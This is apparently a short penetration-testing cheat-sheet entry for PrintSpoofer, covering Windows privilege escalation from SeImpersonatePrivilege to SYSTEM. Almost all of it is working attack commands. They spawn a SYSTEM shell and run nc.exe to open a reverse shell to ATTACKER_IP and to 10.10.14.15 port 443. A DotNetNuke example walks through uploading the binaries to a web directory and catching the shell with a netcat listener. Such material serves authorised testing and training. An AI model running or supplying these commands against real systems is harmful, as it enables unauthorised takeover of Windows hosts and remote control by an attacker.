printspoofer
Requirements
Usage
# Spawn interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd
# Using PrintSpoofer64 with a reverse shell
PrintSpoofer64.exe -c "c:\path\to\nc.exe ATTACKER_IP PORT -e cmd"Example: DNN App Pool to SYSTEM
# Confirm privileges
whoami /priv
# Look for: SeImpersonatePrivilege Enabled
# Upload PrintSpoofer64.exe and nc.exe to writable directory
# Execute reverse shell as SYSTEM
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.14.15 443 -e cmd"
# On attack host, catch shell
nc -lvnp 443
# whoami → nt authority\systemExample: Local Service to SYSTEM
Links
Last updated